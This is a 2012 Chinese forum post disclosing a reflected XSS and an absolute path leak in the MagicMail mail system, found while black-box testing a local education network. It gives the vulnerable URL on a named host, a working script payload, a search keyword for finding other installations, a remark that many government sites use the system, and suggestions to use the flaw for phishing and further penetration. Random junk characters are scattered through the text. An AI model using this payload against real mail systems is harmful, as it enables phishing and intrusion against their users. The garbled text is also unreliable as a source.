今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
& d. r& a* F: M, Z+ @; N) ], |% A
# I& B# S5 Y& F/ n( n & l6 F) G) j! A7 l7 T$ o
包含 一个反射性XSS 以及 绝对路径泄漏
2 _( A5 n" B5 K/ o% i看了看 貌似全部是linux的。
. ?: z& r7 E7 z/ |
, D- s1 K0 W, a3 o6 {关键字:迈捷邮件系统 by MagicMail4 T, r% A& D# D7 G/ _
4 g7 k: R; F! C
可以看到很多政府网站都用这个邮件系统* _) h2 W( e# z+ _8 c4 |/ L3 |8 c8 E
) M5 G; i9 E' {- {: I9 S( v绝对路径 http://madman.in/index.php?login_type=declare&language=
0 h* W! x2 R( [9 s6 E. B
$ l9 _% V# R5 n& t- i( |. q8 A# T8 E6 v6 Z' G6 L3 |
/ s/ w, p! p, t) I7 j- f
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
% k: P q- y, n, m) { p# ]; z5 `
% O( N6 Q6 X% Y, I0 @5 Q4 K( J7 U
& i& G; A$ ~' \' r5 c" Q$ v' O/ N6 |6 I/ V* \7 _
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等 K) m9 m/ W8 v+ B/ y
/ m4 z2 D' ]* g7 s修复方案:看官方补丁吧。9 W! ?6 `3 H s- Z) P# q8 m j& K
|
发表于 2012-11-9 20:38:41
收藏
支持
反对